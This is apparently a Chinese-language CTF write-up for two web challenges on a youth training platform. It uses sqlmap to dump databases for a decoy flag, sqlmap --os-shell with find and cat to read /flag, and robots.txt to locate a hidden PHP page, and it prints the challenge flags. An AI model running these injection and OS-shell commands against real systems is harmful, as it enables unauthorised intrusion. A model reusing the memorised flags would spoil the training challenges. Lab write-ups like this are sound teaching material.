青少年CTF训练平台-web部分随笔

文章管理系统

首先打开环境(>ω<｡人)ZZz♪♪

既然要做题，就要做全面了，图上说了，既然有假flag我就先找出来：

假flag：

打开vmware，使用sqlmap进行处理：

sqlmap -u http://challenge.qsnctf.com:31645/?id=1 --dbs

记得中间的url换成自己的

看到了五个可能：

{*] ctftraining
[*] information_schema
[*] mysql
[*] performance_schema
[*] test
[*] word

那就挨个读取，利用指令

sqlmap -u http://challenge.qsnctf.com:31645/?id=1 -D ctftraining -T test --dump

”ctftraining“改为上述文件夹进行尝试最终得到

好的，得到了假flag了♪（⌒∇⌒）ﾉ""

真flag：

同样打开kali，对sqlmap进行修改代码

sqlmap -u "http://challenge.qsnctf.com:32030/?id=1" --os-shell

进行执行：

进行寻找：

查找一下flag：

find / -name "flag"

看到了，调取：

cat /flag

OK，拿到了  (*˘︶˘*).｡.:*♡

qsnctf{5a73aa45b44b409a815a4051428a3e11}

Robots

打开题目环境：

既然提示了Robots.txt那就访问一下呗：

http://challenge.qsnctf.com:32422/robots.txt

看到了有个什么什么的.php

http://challenge.qsnctf.com:32422/f1ag_1n_the_h3re.php

得到flag：

qsnctf{ed8c1a488b4e4304b89c01531d41b99c}